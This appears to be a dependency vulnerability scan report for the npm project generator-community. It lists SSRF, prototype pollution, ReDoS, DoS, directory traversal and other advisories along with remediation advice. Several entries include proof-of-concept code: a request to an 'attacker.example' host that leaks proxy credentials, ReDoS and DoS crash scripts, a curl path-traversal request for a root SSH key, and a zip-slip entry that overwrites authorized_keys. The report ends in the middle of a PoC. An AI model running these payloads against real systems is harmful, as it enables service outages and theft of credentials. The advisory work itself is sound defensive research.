Vulnerabilities

61 via 431 paths

Dependencies

789

Source

GitHub

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 61
  • 1
Severity
  • 3
  • 22
  • 37
Status
  • 62
  • 0
  • 0

critical severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@11.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, due to mishandling hostnames when processing usernames and passwords.

PoC:

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        http.get(parsed.href)
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);

Remediation

Upgrade parse-url to version 6.0.1 or higher.

References

critical severity

HTTP Response Splitting

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to HTTP Response Splitting via the isFormData and getHeaders handling in the HTTP request path. An attacker can inject arbitrary request headers by supplying a prototype-polluted object that is mistaken for FormData, causing getHeaders() output to be merged into an outgoing request. This lets attacker-controlled values, such as authorization or custom headers, ride along with requests made by applications that pass untrusted objects into Axios, exposing credentials or altering server-side request handling.

Notes

  • The gadget only matters when the request body is a non-FormData payload that Axios still routes through the Node HTTP adapter’s form-data detection path; browser-side usage is not implicated by this code path.
  • The advisory’s prototype-pollution prerequisite can come from any dependency in the application’s tree, not necessarily from Axios itself, so a separate merge/parser bug elsewhere can be enough to trigger the header injection.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

critical severity

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution through the mergeConfig code path in the request configuration handling. An attacker can influence request behavior by supplying a crafted config object with inherited properties such as transport, env, formSerializer, or transform callbacks on Object.prototype, causing Axios to use attacker-controlled settings during request dispatch and form serialization. This can redirect requests, alter serialization and response handling, and break application logic that relies on trusted per-request configuration.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

high severity

Authentication Bypass by Spoofing

  • Vulnerable module: autolinker
  • Introduced through: markdown-magic@0.1.18

Detailed paths

  • Introduced through: generator-community@commonality/generator-community markdown-magic@0.1.18 markdown-toc@1.2.0 remarkable@1.7.4 autolinker@0.28.1

Overview

autolinker is an Utility to Automatically Link URLs, Email Addresses, Phone Numbers, Twitter handles, and Hashtags in a given block of text/HTML.

Affected versions of this package are vulnerable to Authentication Bypass by Spoofing when a URL string contains a Unicode RTLO character, two separate links are generated.

Remediation

Upgrade autolinker to version 3.16.1 or higher.

References

high severity
new

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain sensitive proxy credentials by controlling a redirect target and causing the application to follow a redirect from a proxied request to a direct connection, resulting in the Proxy-Authorization header being sent to the attacker's server.

Note:

This is only exploitable if the application is running in Node.js with automatic redirects enabled and uses an authenticated proxy configuration, where the redirect target resolves to a direct connection (such as when HTTPS_PROXY is unset or excluded by NO_PROXY).

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, or by ensuring proxy environment variables are configured consistently across protocols to prevent unexpected changes from proxied to direct connections.

PoC

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

await axios.get('http://attacker.example/start');

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the mergeConfig function. An attacker can cause the application to crash by supplying a malicious configuration object containing a __proto__ property, typically by leveraging JSON.parse().

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://domain/get", maliciousConfig);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.30.3, 1.13.5 or higher.

References

high severity

Uncontrolled Recursion

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Uncontrolled Recursion through the toFormData recursive serializer in lib/helpers/toFormData.js. An attacker can crash a process by supplying a deeply nested object as request data or params, causing unbounded recursion and a call-stack overflow during multipart/form-data or query-string serialization.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: cross-spawn
  • Introduced through: yeoman-generator@2.0.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 cross-spawn@5.1.0
    Remediation: Upgrade to yeoman-generator@2.0.5.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 cross-spawn@5.1.0
    Remediation: Upgrade to generator-license@5.2.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 cross-spawn@5.1.0
    Remediation: Upgrade to generator-node@2.4.0.
  • Introduced through: generator-community@commonality/generator-community update-notifier@2.2.0 boxen@1.3.0 term-size@1.2.0 execa@0.7.0 cross-spawn@5.1.0
    Remediation: Upgrade to update-notifier@4.0.0.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

PoC

const { argument } = require('cross-spawn/lib/util/escape');
var str = "";
for (var i = 0; i < 1000000; i++) {
  str += "\\";
}
str += "◎";

console.log("start")
argument(str)
console.log("end")

// run `npm install cross-spawn` and `node attack.js` 
// then the program will stuck forever with high CPU usage

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade cross-spawn to version 6.0.6, 7.0.5 or higher.

References

high severity
new

Denial of Service (DoS)

  • Vulnerable module: pacote
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0

Overview

pacote is a JavaScript package downloader

Affected versions of this package are vulnerable to Denial of Service (DoS) via the addGitSha function. An attacker can exploit this vulnerability by supplying a specially crafted spec.rawSpec value that triggers the function’s regex replacement and string-manipulation logic, causing excessive CPU consumption and potentially stalling or crashing the process.

PoC

const addGitSha = require('pacote/lib/util/add-git-sha');

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += "#";
}
str += "\n@";

const spec = {
  rawSpec: str,
  hosted: null,
};

console.log("start");
addGitSha(spec, "");
console.log("end");

// run `npm install pacote` and `node attack.js` 
// then the program will stuck forever with high CPU usage

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

There is no fixed version for pacote.

References

high severity
new

Directory Traversal

  • Vulnerable module: tmp
  • Introduced through: generator-license@5.1.0, generator-node@2.2.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 inquirer@1.2.3 external-editor@1.1.1 tmp@0.0.29
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 inquirer@1.2.3 external-editor@1.1.1 tmp@0.0.29
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Directory Traversal via unsanitized input in the prefix, postfix, or dir parameters during path construction. An attacker can create files outside the intended temporary directory, potentially overwriting or placing files in sensitive locations, by supplying crafted values containing traversal sequences or absolute paths.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tmp to version 0.2.6 or higher.

References

high severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.8 or higher.

References

high severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution in the request configuration merge process. An attacker can access sensitive request configuration data, including authentication credentials and response data, and alter the response returned to the application by injecting a malicious function into Object.prototype.transformResponse prior to the request.

Note: This is only exploitable if a separate vulnerability or attacker-controlled code has polluted Object.prototype with a function-valued transformResponse property before the request is made.

PoC

import http from 'http';
import axios from 'axios';

const seen = [];

const server = http.createServer((req, res) => {
